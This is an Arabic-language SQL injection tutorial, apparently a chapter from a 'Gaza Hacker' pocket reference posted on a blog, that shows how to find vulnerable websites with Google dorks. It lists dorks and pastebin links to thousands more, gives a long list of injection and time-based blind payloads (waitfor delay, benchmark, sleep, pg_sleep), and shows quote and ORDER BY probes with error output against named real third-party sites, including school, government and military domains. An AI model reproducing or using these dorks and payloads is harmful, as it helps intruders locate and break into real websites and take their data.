الموضوع الإستِبَاقِي الأول [Get Site vlu with Dork search] .
البحث عن مواقع مصابه باستخدام الدوركات :
هذا الموضوع هو الفصل الاول بكتاب : Gaza HaCker SQLI Pocket Reference ولقد رئيت ان اضمه لمشروع تطوير الحقن فالله المستعان .
أولاً : لابد لنا من مواقع مصابه لكى نقوم بحقنها واستخراج البيانات
الحساسه منها ولكى يتأنى لنا ذلك لابد من البحث عنها اولاً فالسؤال
يطرح نفسه الان كيف نقوم بذلك اقول وبالله التوفيق ﻻبد ان يتوفر
لنا : دورك + محرك بحث + بعض المجهود فالنتابع ! .
# مثال على الدوركات #
· page.php?id=
· trainers.php?id=
· article.php?ID=
· games.php?id=
· newsDetail.php?id=
· staff.php?id=
· products.php?id=
· news_view.php?id=
· opinions.php?id=
· pages.php?id=
· prod_detail.php?id=
واليكم قرابة العشرين الف دورك .
http://pastebin.com/ZuaJaZSj
http://pastebin.com/T8YKuGxN
http://pastebin.com/W089sZXu
http://pastebin.com/T8YKuGxN
http://pastebin.com/W089sZXu
# كيف تستخدم الدوركات #
يتم استخدامها بدمجِها مع الاستعلام التالى :
"inurl:."domain"/"dorks" "
# شرح الاستعلام #
inurl : ابحث بداخل رابط المواقع
ويمكن استبدالها باحد الكلمات التاليه:
intitle:
intext:
define:
site:
info:
link:
domain : نوع المواقع المراد البحث عنها
# من امثلتها #
.gov = Government websites
.edu = Educational websites
.org = Organizational websites
.com = Commercial websites
.info = Informative websites
.net = Networking websites ( similar to .com)
dorks : الدورك المستخدم من جهتنا
# مثال تطبيقى على هذا الاستعلام #
"inurl:.com/page.php?id="
بمعنى ابحث عن الروابط التى بها هذا الامتداد:.com/page.php?id=
نذهب الى محرك البحث جوجال ونبحث : www.google.com
ظهرت مواقع كثيره لهذا الدورك بمحرك البحث جوجال نبدئ باختبار الثغره بها ولنفتح اول موقع ونضع بعد رابط الموقع علامة التنصيص الفرديه كومه [ ' ] ونفعل ذلك مع هذا المواقع الناتجه لنا تباعاً .
www.marinaplast.com/page.php?id=13'
# ونستطيع استبدال علامة كومه [ ' ] بما ياتى ادناه #
"
/
/*
#
)
(
)'
('
and 1=1
and 1=2
and 1>2
and 1<=2
+and+1=1
+and+1=2
+and+1>2
+and+1<=2
/**/and/**/1=1
/**/and/**/1=2
/**/and/**/1>2
/**/and/**/1<=2
/**/or/**/1/**/=/**/1
/**/or/**/1/**/=/**/2
/**/or/**/1/**/>/**/2
/**/or/**/1/**/<=/**/2
and 50=50
and 50=52
and 50>52
and 50<=52
+and+50=50
+and+50=52
+and+50>52
+and+50<=52
/**/and/**/50=50
/**/and/**/50=52
/**/and/**/50>52
/**/and/**/50<=52
/**/or/**/51/**/=/**/51
/**/or/**/51/**/=/**/52
/**/or/**/51/**/>/**/52
/**/or/**/51/**/<=/**/52
waitfor delay '0:0:10'--
; waitfor delay '0:0:10'--
+waitfor+delay+'0:0:10'--
/**/waitfor/**/delay/**/'0:0:10'--
%20waitfor%20delay%20'0:0:20'--
waitfor delay '0:0:10'--
; waitfor delay '0:0:10'--
+waitfor+delay+'0:0:10'/*
/**/waitfor/**/delay/**/'0:0:10'/*
%20waitfor%20delay%20'0:0:20'/*
' waitfor delay '0:0:10'--+
'+waitfor+delay+'0:0:10'--+
'/**/ waitfor/**/delay/**/'0:0:10'--+
'%20waitfor%20delay%20'0:0:20'--+
and 0=benchmark(300,MD5(1))--
+and+0=benchmark(300,MD5(1))+--
/**/and/**/0=benchmark(300,MD5(1))/**/--
%20and%200=benchmark(300,MD5(1))%20--
; and 0=benchmark(300,MD5(1))/*
and 0=benchmark(300,MD5(1))/*
+and+0=benchmark(300,MD5(1))+/*
/**/and/**/0=benchmark(300,MD5(1))/**//*
%20and%200=benchmark(300,MD5(1))%20/*
' and 0=benchmark(300,MD5(1))--+
'+and+0=benchmark(300,MD5(1))+--+
'/**/and/**/0=benchmark(300,MD5(1))/**/--+
'%20and%200=benchmark(300,MD5(1))%20--+
sleep(__TIME__)#
1 or sleep(__TIME__)#
" or sleep(__TIME__)#
' or sleep(__TIME__)#
" or sleep(__TIME__)="
' or sleep(__TIME__)='
1) or sleep(__TIME__)#
") or sleep(__TIME__)="
') or sleep(__TIME__)='
1)) or sleep(__TIME__)#
")) or sleep(__TIME__)="
')) or sleep(__TIME__)='
pg_sleep(__TIME__)--
1 or pg_sleep(__TIME__)--
" or pg_sleep(__TIME__)--
' or pg_sleep(__TIME__)--
1) or pg_sleep(__TIME__)--
") or pg_sleep(__TIME__)--
') or pg_sleep(__TIME__)--
1)) or pg_sleep(__TIME__)--
")) or pg_sleep(__TIME__)--
')) or pg_sleep(__TIME__)--
ظهر خطاء حقن بالموقع.
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1)
# هذا وقد تختلف الاخطاء الناتجه من موقع لموقع ومن قاعده لقاعده #
# امثله متنوعه للأخطاء التى تنتج جراء الاصابه بثغرات الحقن #
· mysql_num_rows()
· mysql_fetch_array()
· Error Occurred While Processing Request
· Server Error in '/' Application
· Microsoft OLE DB Provider for ODBC Drivers error
· error in your SQL syntax
· Invalid Querystring
· OLE DB Provider for ODBC
· VBScript Runtime
· ADODB.Field
· BOF or EOF
· ADODB.Command
· JET Database
· mysql_fetch_row()
· Syntax error
· include()
· mysql_fetch_assoc()
· mysql_fetch_object()
· mysql_numrows()
· GetArray()
· FetchRow()
· Input string was not in a correct format
· Microsoft VBScript;
واليكم تفصيل شكل خطاء كل قاعده :
•◘╚╦☆ MySQL-DB ☆╚╦◘•
www.marinaplast.com/page.php?id=13'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax
warning mysql_fetch_array() supplied argument is not a valid mysql result resource in
warning mysql_fetch_assoc() expects parameter 1 to be resource boolean given in
warning mysql_num_rows() expects parameter 1 to be resource boolean given
warning mysql_num_rows() supplied argument is not a valid mysql result resource in
warning mysql_fetch_assoc() supplied argument is not a valid mysql result resource in
warning mysql_connect() function.mysql-connect can't connect to mysql server on
warning mysql_result() expects parameter 1 to be resource boolean given in
•◘╚╦☆ mssql-DB ☆╚╦◘•
warning mssql_connect() function.mssql-connect unable to connect to server
warning mssql_query function.mssql-query message invalid object name
warning mssql_pconnect function mssql pconnect unable connect server
•◘╚╦☆ MS-Access ☆╚╦◘•
www.ift.co.il/showPage.asp?id=24'
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151%27
Microsoft JET Database Engine error '80004005' Unspecified error
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver]
•◘╚╦☆ Oracle-DB ☆╚╦◘•
Warning: oci_parse() [function.oci-parse]: ORA-01756
•◘╚╦☆ PostgreSQL-DB ☆╚╦◘•
http://www.sabbaba.co.il/prod.phtml?cat_id=9'
Warning: pg_query(): Query failed: ERROR: unterminated quoted string at or near
Warning: pg_query() [function.pg-query]: Query failed: ERROR: syntax error at or near
•◘╚╦☆ Sybase-DB ☆╚╦◘•
http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630'
Warning: sybase_query() [function.sybase-query]:
•◘╚╦☆ Firebirdsql-DB ☆╚╦◘•
http://www.hca.aer.mil.br/externo/index.php?pag=noticias/exibir_noticias.php?id=362'
Warning: ibase_query() [function.ibase-query]
ibase_query()
ibase_fetch_row()
ibase_fetch_object()
ibase_fetch_assoc()
ibase_free_result()
Unclosed quotation mark after the character string ''.
وهذا معناه تخمين ﻻ تصلح مع الاوامر .
Input string was not in a correct format.
وعند استخدام ORDER-BY ينتج خطاء خاص بكل قاعده .
•◘╚╦☆ MySQL ☆╚╦◘•
www.marinaplast.com/page.php?id=13 order by 1000
Unknown column '1000' in 'order clause'
•◘╚╦☆ PostgreSQL ☆╚╦◘•
http://www.sabbaba.co.il/prod.phtml?cat_id=9 order by 1000
ORDER BY position 1000 is not in select list
•◘╚╦☆ Microsoft SQL Server ☆╚╦◘•
http://testasp.vulnweb.com/showthread.asp?id=1 order by 1000
The ORDER BY position number 1000 is out of range of the number of items in the select list.
•◘╚╦☆ Oracle ☆╚╦◘•
http://www.debunschoter.nl/scripts/edoris/edoris.dll?tem=bun_text_detail_new&doc_id=90105 order by 1000
ORA-01785: ORDER BY item must be the number of a SELECT-list expression
☆╚╦◘• فريق قراصنة غزة •◘╚╦☆
ما رايك بهافج هل تفضله ام تفضل الحقن اليدوي
ردحذف